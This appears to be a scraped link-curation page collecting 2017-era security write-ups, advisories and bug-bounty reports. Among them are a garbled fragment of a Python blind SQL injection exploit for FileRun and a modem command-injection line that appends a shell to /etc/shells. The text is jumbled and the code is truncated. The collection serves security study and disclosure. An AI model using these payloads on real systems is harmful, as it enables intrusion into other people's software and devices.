background preloader

Bug Bounty & Exploits

Facebook Twitter

Bug Bounty

FileRun < 2017.09.18 - SQL Injection. #! /usr/bin/env python # Exploit Title: FileRun <=2017.09.18 # Date: September 29, 2017 # Exploit Author: SPARC # Version: 2017.09.18 # Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0 import sys,time,urllib,urllib2,cookielib from time import sleep print """ | FileRun <= 2017.09.18 | | BlindSQLi Proof of Concept (Post Authentication) | | by Spentera Research (research[at] | host = raw_input("[*] Target IP: ") username = raw_input("[*] Username: ") password = raw_input("[*] Password: ") delay=1 global cookie,data def masuk(usr,pswd): log_data = { 'username': usr, 'password': pswd post_data = urllib.urlencode(log_data) cookjar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar)) try: content = global data,cookie data = dict((, cookie.value) for cookie in cookjar) cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID'])) return str( except: print '\n[-] Uh oh!

Sys.exit(0) def konek(m,n): #borrow from SQLmap :) sleep(1) Car Hacking 101 - Alan Mond, LevelUp 2017. Wifiphisher/wifiphisher: Automated victim-customized phishing attacks against Wi-Fi clients. ImageTragick. Smiegles/crossdomain: Exploit insecure crossdomain.xml files. XPN InfoSec Blog. In my previous post, I showed a number of ways of gaining SYSTEM privileges. The post ended up being a lot more successful than I thought it would, so thanks to everyone who checked it out :) In this post I wanted to take a look at something which I touched on previously, and that is just how a Windows kernel based exploit achieves privilege escalation. Rather than take something like HackSys Extreme Vulnerable Windows Driver, I wanted to work on something a little bit different, and came across an vulnerability recently disclosed by Google Project Zero here.

This vulnerability is pretty nice and easy to understand due to the effort mjurczyk put into the writeup, and is also marked as a "Wont-Fix" from Microsoft which means that 32-bit versions of Windows 10 Creators Edition are still vulnerable. So.... let's get started. Vulnerability overview Reading the disclosure, we can see that this vulnerability affects Windows 10 32-bit Creators Update. Setting up the lab Process Injection dg fs.

Symantec Encryption Desktop Local Privilege Escalation – Exploiting an Arbitrary Hard Disk Read/Write Vulnerability Over NTFS – Nettitude Labs. “Huge Dirty COW” (CVE-2017–1000405) – Bindecy. The “Dirty COW” vulnerability (CVE-2016–5195) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast — millions of users could be compromised easily and reliably, bypassing common exploit defenses. Plenty of information was published about the vulnerability, but its patch was not analyzed in detail. We at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete. “Dirty COW” recap First, we need a full understanding of the original Dirty COW exploit.

The original vulnerability was in the get_user_pages function. Let’s now take a look at the relevant code in __get_user_pages: The while loop’s goal is to fetch each page in the requested page range. The original vulnerable code resided at the end of faultin_page: Transparent Huge Pages (THP) FileRun < 2017.09.18 - SQL Injection. Mac OS X Local Javascript Quarantine Bypass | segment. Details Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary Javascript code without restrictions. Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted environment. For example, a quarantined html file won't be able to load local resources. The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the excution of arbitrary javascript commands in its (unrestricted) context.

A demo video is available at The mentioned file is located at /System/Library/CoreServices/ and contains the following code: In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates the response content as javascript code. PoC: #! CVE-2017-0785/ at master · ojasookert/CVE-2017-0785. 1302 - Apple: Heap Overflow in AppleBCMWLANCore driver when handling Completed Firmware Timestamp messages (0x27) - project-zero - Monorail. RIPS - Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection.

With over 84 million downloads, Joomla! Is one of the most popular content management systems in the World Wide Web. It powers about 3.3% of all websites’ content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This one vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over any Joomla! <= 3.7.5 installation within seconds that uses LDAP for authentication. Requirements - Who is affected Installations with the following requirements are affected by this vulnerability: Joomla! This is not a configuration flaw and an attacker does not need any privileges to exploit this vulnerability. Impact - What can an attacker do By exploiting a vulnerability in the login page, an unprivileged remote attacker can efficiently extract all authentication credentials of the LDAP server that is used by the Joomla!

Vulnerability Analysis - CVE-2017-14596. DIY Spy Program: Abusing Apple's Call Relay Protocol - Martin Vigo. Introduction Apple introduced a new set of features in iOS 8 and Yosemite under the name “Continuity”. These features allow iPhones to work with other iDevices such as Macs and iPads in new ways. Handoff, Instant hotspot and Airdrop are some of the new services offered by Continuity. Among these new services is one named “Call Relay”. In order for it to work, both devices (iPhone and the iDevice that makes/takes the call) need to be on the same WiFi. How it works The first step is to get a high level understanding of the protocol and how the different actors interact.

We can differentiate several actors in different environments. Environments The protocol works on 3 different environments that are also 3 possible targets. GSM would imply breaking LTE or taking advantage of existing downgrade attacks. Approach Once we have a high level understanding of the protocol we need to get down to raw bytes and work our way up by identifying headers, counters, checksums, payloads, etc. Discovery Aha! Sec17 redini. How can I securely use CSS-in-JS with React? — React Armory. CSS-in-JS is an exciting new technology that completely eliminates the need for CSS class names. It makes it possible to add styles directly to your components, using the full power of CSS.

Unfortunately, it also promotes interpolation of unescaped props into that CSS, opening you up to injection attacks. And CSS injection attacks are a major security hazard. If your site or app accepts user input and displays it to others users, usage of CSS-in-JS libraries like styled-components or glamorous may result in your site being defaced. But worse, you may inadvertently allow attackers to make requests from your user’s machines, siphon their data, steal their credentials, or even execute arbitrary JavaScript. Of course, it is also possible to use CSS-in-JS safely. The golden rule Never interpolate user input into your stylesheets. . * At least without sanitizing that input first.

If you must use user input for your styles, consider using raw style props. Exploiting CSS-in-JS A data-siphoning avatar. Mastercard Internet Gateway Service: Hashing Design Flaw – Last year I found a design error in the MD5 version of the hashing method used by Mastercard Internet Gateway Service. The flaw allows modification of transaction amount. They have awarded me with a bounty for reporting it. This year, they have switched to HMAC-SHA256, but this one also has a flaw (and no response from MasterCard). If you just want to know what the bug is, just skip to the Flaw part. What is MIGS? When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website).

How does it work? The payment flow is usually like this if you use MIGS: Notice that instead of communicating directly between servers, communications are done via user’s browser, but everything is signed. Flaw in the MIGS MD5 Hashing This bug is extremely simple. MD5(Secret + Data) But it was not vulnerable to hash length extension attack (some checks were done to prevent this). Name: Joe Amount: 10000 Card: 1234567890123456. Objective-See. High Sierra's 'Secure Kernel Extension Loading' is Broken › a new 'security' feature in macOS 10.13, is trivial to bypass love these blog posts?

Support my tools & writing on patreon! Mahalo :) Background With each new release of macOS, Apple introduces new 'built-in' security enhancements...and macOS High Sierra (10.13) is no exception. In this blog post we'll take a brief look at High Sierra's somewhat controversial "Secure Kernel Extension Loading" (SKEL) feature. . $ kextstat Index Refs Size Wired Name 1 90 0x9e30 0x9e30 2 8 0x3960 0x3960 ... 130 0 0x4b00 0x4b000 com.un.approved.kext Documented in Apple's Technical Note TN2459, Secure Kernel Extension Loading, is "a new feature that requires user approval before loading new third-party kernel extensions. " Instead the main (security) goal of SKEL is to block the loading of legitimate but (known) vulnerable kexts.

Was "already installed at the time of upgrading to macOS High Sierra. " Diff - e33fd30777f99a0d6e16b16d096a2663b1031457^! - v8/v8.git - Git at Google. Diff --git a/src/crankshaft/hydrogen-alias-analysis.h b/src/crankshaft/hydrogen-alias-analysis.h index 1f32b7a..d06aabc 100644 --- a/src/crankshaft/hydrogen-alias-analysis.h +++ b/src/crankshaft/hydrogen-alias-analysis.h diff --git a/test/mjsunit/regress/regress-crbug-722756.js b/test/mjsunit/regress/regress-crbug-722756.js new file mode 100644 index 0000000..b4d82ad --- /dev/null +++ b/test/mjsunit/regress/regress-crbug-722756.js @@ -0,0 +1,40 @@ +// Copyright 2017 the V8 project authors. SharknAT&To - Nomotion Blog. Introduction When evidence of the problems described in this report were first noticed, it almost seemed hard to believe. However, for those familiar with the technical history of Arris and their careless lingering of hardcoded accounts on their products, this report will sadly come as no surprise.

For everyone else, prepare to be horrified. In all fairness, it is uncertain whether these gaping security holes were introduced by Arris (the OEM) or if these problems were added after delivery to the ISP (AT&T U-verse). From examining the firmware, it seems apparent that AT&T engineers have the authority and ability to add and customize code running on these devices, which they then provide to the consumer (as they should). Some of the problems discussed here affect most AT&T U-verse modems regardless of the OEM, while others seem to be OEM specific. 1. Figure 1: Attacker view of cshell after login to an affected U-verse modem. >> ping -c 1;echo /bin/nsh >>/etc/shells 2. 3. Escaping a Python sandbox with a memory corruption bug. BIOS SMI Handler Input Validation Failures. Lenovo Security Advisory: LEN-14695 Potential Impact: Execution of code in System Management Mode by an attacker with local administrative access Severity: High Scope of Impact: Industry-Wide CVE Identifier: CVE-2017-3753 Summary Description: A vulnerability has been identified in some Lenovo products that use UEFI (BIOS) code developed by American Megatrends, Inc.

Mitigation Strategy for Customers (what you should do to protect yourself): AMI has supplied a fix for this vulnerability to Lenovo. Security-conscious users should consider the following mitigation steps if an immediate BIOS update is not possible to protect themselves to the fullest extent with the understanding that they DO NOT fix or fully protect against an exploit of this vulnerability: Product Impact: Please click for more info. Desktop Desktop - All in One ThinkServer ThinkStation Acknowledgements: Lenovo thanks Alex Matrosov, Principal Research Scientist, Cylance. Other information and references: Revision History: Desktop ThinkServer. Pre-domain wildcard CORS Exploitation – Arbaz Hussain – Medium. Exploitation : Now it’s time to find Good Exploitation Endpoint to demonstrate & Increase the Impact.There was nothing much on to exploit just like static site asking to install their browser extension . But one thing kept my MINDSET to find some exploitation path is that to install that extension you need to be logged in .

I doubted they were storing some information somewhere . So I Started bruteforcing , Reading docs for API Endpoints . And came across which contain’s the user detail’s along with SESSIONID in json response . Able to Takeover user account’s remotely. PowerPoint File Armed with CVE-2017-0199 and UAC Bypass. FortiGuard Labs recently discovered a new malicious PowerPoint file named ADVANCED DIPLOMATIC PROTOCOL AND ETIQUETTE SUMMIT.ppsx. Taking a look at the four slides of the PowerPoint Open XML Slide Show (PPSX) file, we can tell that it targets people from UN agencies, Foreign Ministries, International Organizations, and those who interact with international governments. We will take a look on how opening this PowerPoint file could compromise your system. Here’s an overview on how the attack works: Figure 01: Flow of the attack process This exploit targets a vulnerability identified as CVE-2017-0199, which was disclosed and patched last April 2017.

It triggers a remote code execution in Microsoft Office or WordPad when parsing specially crafted files. This is not the first time we have sees attackers leveraging this vulnerability. When the latest malicious PowerPoint Slide Show is opened, it triggers a script in ppt/slides/_rels/slide1.xml.rels. Figure 02: PPSX file leveraging CVE-2017-0199. OS X KERNEL EXPLOIT 기초 (OS X 10.12 SIERRA) &vert; THEORI. Written by reset + s0ngsari 최근 많은 연구들이 Windows 운영체제에 초점이 맞추어져 있지만, 보안적인 측면에서 아이폰과 맥북에 탑재되는 iOS와 macOS를 빼놓을 수 없다. 이번 블로그 시리즈를 통해서 OS X 커널에서의 버그 분석 및 익스플로잇 기법 등을 알아본다. (1) 커널 버그 찾기 BSD, Mach와 IOKit 등 과 같은 커널 레벨에서 실행 가능한 버그를 퍼징, 소스코드 오디팅과 같은 방법을 통해 발견함.

BSD : 커널의 BSD 부분은 대부분의 시스템 호출, 네트워킹 및 파일 시스템 기능을 제공함. FreeBSD 5에서 가져온 소스. Mach : Carnegie Mellon University에서 개발 된 Mach 3.0 마이크로 커널에서 파생되어짐. . (2) Exploit Primitive(s) Arbitrary Read / Write를 이용해 취약점을 공략하는데에 있어서 필요한 데이터를 획득 하거나, 커널 영역에 임의의 데이터를 작성함. . (3) 커널 권한 획득 & AAR / AAW in Kernel kernel_task(pid=0)의 권한을 위해 필요한 값 ipc object와 kernel task를 획득하기 위해 커널에 존재하는 모든 프로세스를 트레버싱 한 후 유저 영역에 데이터를 덤프 한다.

. (4) 루트 권한 획득 각각의 프로세스가 커널 메모리에 적재되어 있기 때문에, 타겟 프로세스를 잡아서 아래의 프로세스 권한 구조체의 CR_RUID(Credential Real UID)를 0으로 변경 [bsd/sys/ucred.h] 변경이 완료되면, 해당 프로세스는 root 권한으로 돌아가는 상태가 되어짐. 배경 지식 Kernel Zone OS X 의 커널에서는 힙이 할당되는 Zone이라는 구조를 사용하고 있음. OOL(Out-Of-Line) Port IPC 통신에서 발생하는 인라인이 아닌 패킷을 적재 OOL 데이터를 수신하기 전까지 커널에서 보존되어짐. OS X Kernel Mitigation kASLR 커널에서의 RWX 권한 방지 우회 : ROP. Public Database Directory - Public DB Host. Vulnerable Docker VM - NotSoSecure. Multiple vulnerabilities in RubyGems. From random block corruption to privilege escalation: A filesystem attack vector for rowhammer-like attacks.

[Demo] From random block corruption to privilege escalation. Positive Technologies - learn and secure : Disabling Intel ME 11 via undocumented mode. Exploiting Node.js deserialization bug for Remote Code Execution | OpSecX. SensePost | Rattler:identifying and exploiting dll preloading vulnerabilities. Hyper-V backdoor for UEFI. A Stealth DoS Attack Against CAN-based Automotive Networks [ICS-ALERT-17-209-0] Mitigation tool. Le journal d'un reverser: Meet the "Wake" malware: DDOS and more! Vine User Private information disclosure - Bug Bounty POC. Benkow_: Quick look at another Alina fork: XBOT-POS.

TrendLabs Security Intelligence BlogCVE-2017-0199: New Malware Abuses PowerPoint Slide Show - TrendLabs Security Intelligence Blog. [Demo] From random block corruption to privilege escalation. Thinkst Thoughts...: All your devs are belong to us: how to backdoor the Atom editor. Office 365 - Advanced Threat Protection (ATP): Features and Shortfalls - TrustedSec. Harvesting Cb Response Data Leaks for fun and profit | DirectDefense. Project Zero: Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read. $10k host header - Test. Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read. Security vulnerabilities fixed in Firefox 55. Smuggling HTA files in Internet Explorer/Edge. Shellcode: Windows API hashing with block ciphers ( Maru Hash ) | modexp.

Creating Real Looking User Accounts in AD Lab. Juniper Networks - 2017-07 Security Bulletin: SRX Series: Hardcoded credentials in Integrated UserFW feature. (CVE-2017-2343) Microsoft Windows - LNK Shortcut File Code Execution. Android_vuln_poc-exp/EXP-CVE-2016-6738 at master · jiayy/android_vuln_poc-exp. Stored XSS at Google firebase via Google Cloud IAM. One Cloud-based Local File Inclusion = Many Companies affected. A Windows UAC Bypass using Device Manager – i break software. [BugBounty] Decoding a $□,000.00 htpasswd bounty. Get_content. [Uber 8k Bug] Login CSRF + Open Redirect = Account Take Over – Ron Chan. How I could Steal Your Google Bug Hunter Account with Two Clicks in IE – Ron Chan. Respect XSS: A Look at CVE-2017-8514 --- SharePoint's `Follow` Feature XSS. Path of Least Resistance: Cellular Baseband to Application Processor Escalation on Mediatek Devices.

1296 - VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP - project-zero - Monorail. WiSec17 ulqinaku. Zero Day Initiative — Pythonizing the VMware Backdoor. Revoke obfuscation report. Exploiting Cross Origin Resource Sharing. Vine User Private information disclosure - Bug Bounty POC. Hacking Voting Machines at DEF CON 25. 2017 Runner-Up: Neville Longbottom – Underhanded Crypto Contest. [CVE-2017-11105] OnePlus 2 Lack of SBL1 Validation Broken Secure Boot.